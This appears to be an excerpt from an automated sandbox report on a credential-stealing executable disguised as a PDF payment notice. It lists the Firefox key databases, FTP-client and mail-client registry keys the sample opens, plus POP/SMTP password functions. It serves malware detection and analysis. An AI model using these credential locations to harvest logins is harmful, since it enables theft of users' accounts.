Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txt
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal FTP login credentials
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal mail credentials (via file access)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal mail credentials (via file registry)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: PopPassword 2_2_0040D069
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: SmtpPassword 2_2_0040D069
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: PopPassword 2_1_0040D069
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: SmtpPassword 2_1_0040D069

Malware Configuration

No configs have been found

Behavior Graph

Behavior Graph ID: 195637